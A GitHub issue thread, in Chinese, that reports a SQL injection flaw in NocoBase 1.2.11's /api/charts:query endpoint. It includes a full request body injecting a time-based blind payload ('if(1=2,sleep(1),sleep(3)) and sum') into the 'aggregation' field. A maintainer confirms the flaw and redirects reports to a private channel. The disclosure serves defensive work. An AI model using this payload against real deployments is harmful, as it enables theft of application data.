### ISSUE TITLE
应用存在 SQL 注入漏洞

### ISSUE THREAD

**Issue by Pepsi33** [nocobase/nocobase#4813]
## * 应用存在 SQL 注入漏洞，恶意用户可通过拼接构造攻击请求窃取应用数据

```
POST /api/charts:query

{"uid":"oyzgjlfiz8i","dataSource":"main","collection":"t_books","filter":null,"orders":[],"measures":[

{"field":["book_name"],"aggregation":"count","alias":"book_name"}
,

{"field":["book_test_gd_price"],"aggregation":"if(1=2,sleep(1),sleep(3)) and sum","alias":"book_test_gd_price"}
],"dimensions":[]}

aggregation 参数
```
<img width="696" alt="image" src="https://github.com/nocobase/nocobase/assets/19296017/db5c9ac3-1ea5-4a59-8883-3b983ae88f70">

## * Environment

- NocoBase version: 1.2.11

- Database type and version: MySQL 8.x,
  

- OS: MacOS

- Deployment Methods: Create-nocobase-app

- Docker image version:

- NodeJS version: 20

**Comment by zhouyanliang** [comment]
感谢提供信息，问题已经确定，将尽快修复。Issue 暂时先关闭并将删除，后续安全问题请通过这里报告:
<img width="1465" alt="image" src="https://github.com/nocobase/nocobase/assets/1267426/c1958886-67cd-40b9-9248-8dffc62dc3fd">
